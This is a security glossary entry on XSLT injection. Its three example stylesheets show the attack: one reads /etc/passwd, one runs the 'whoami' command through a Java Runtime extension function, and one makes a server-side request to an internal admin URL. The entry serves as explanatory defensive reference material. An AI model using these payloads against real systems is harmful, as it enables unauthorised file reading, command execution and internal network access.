Security Glossary

XSLT Injection

A vulnerability where malicious content injected into XSLT stylesheets can lead to file disclosure, SSRF, or code execution through extension functions.

XSLT Injection is a vulnerability where attackers can inject malicious content into XSLT (Extensible Stylesheet Language Transformations) stylesheets, potentially leading to information disclosure, server-side request forgery, or remote code execution.

How It Works

XSLT transforms XML documents using stylesheet rules. When user input influences XSLT processing or stylesheet content, attackers can inject XSLT elements that access the filesystem, make network requests, or execute code through extension functions.

Information Disclosure

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="/">
    <!-- Read local file -->
    <xsl:value-of select="document('/etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>

Code Execution (Java)

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
                version="1.0">
  <xsl:template match="/">
    <xsl:variable name="rtobject" select="rt:getRuntime()"/>
    <xsl:variable name="process" select="rt:exec($rtobject,'whoami')"/>
  </xsl:template>
</xsl:stylesheet>

SSRF via XSLT

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="/">
    <xsl:value-of select="document('http://internal-server/admin')"/>
  </xsl:template>
</xsl:stylesheet>

Vulnerable Contexts

  • PDF generators using XML/XSLT
  • Document conversion services
  • XML-based reporting systems
  • Content management systems

See Also